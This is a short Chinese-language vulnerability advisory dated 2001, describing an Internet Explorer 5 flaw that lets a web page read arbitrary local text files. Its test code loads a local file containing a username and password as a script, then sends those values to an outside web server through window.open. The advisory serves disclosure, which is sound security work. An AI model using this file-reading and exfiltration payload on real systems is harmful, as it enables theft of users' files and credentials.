Internet Explorer 5可以读取任意文件

发布时间：2001-06-11
更新时间：2001-06-11
严重程度：高
威胁程度：远程非授权文件存取
错误类型：设计错误
利用方式：客户机模式

受影响系统

IE5

详细描述
IE5中存在一个安全漏洞，可能导致读取客户端任意文本文件。

测试代码
如果客户端c:\winnt目录下存在test.txt文件，内容如下：
us="stefaan"
passwd="mypasswd"

那么下面的代码可以读取内容：

<script src=" <file:///C:/WINNT/test.txt>
file:///C:/WINNT/test.txt"></script>

而HTML页会把这个文件作为脚本而us和passwd作为变量。

然后可以使用发送这些信息到WEB服务器：

<script>
//alert(passwd)
window.open(" <http://myurl/myasppage.asp?us>
http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" + escape(passwd),
"blabla")
</script>

解决方案
尚无

相关信息
Stefaan Deman (Stefaan.Deman@compex.be)

最近严重漏洞

Internet Explorer 5可以读取任意文件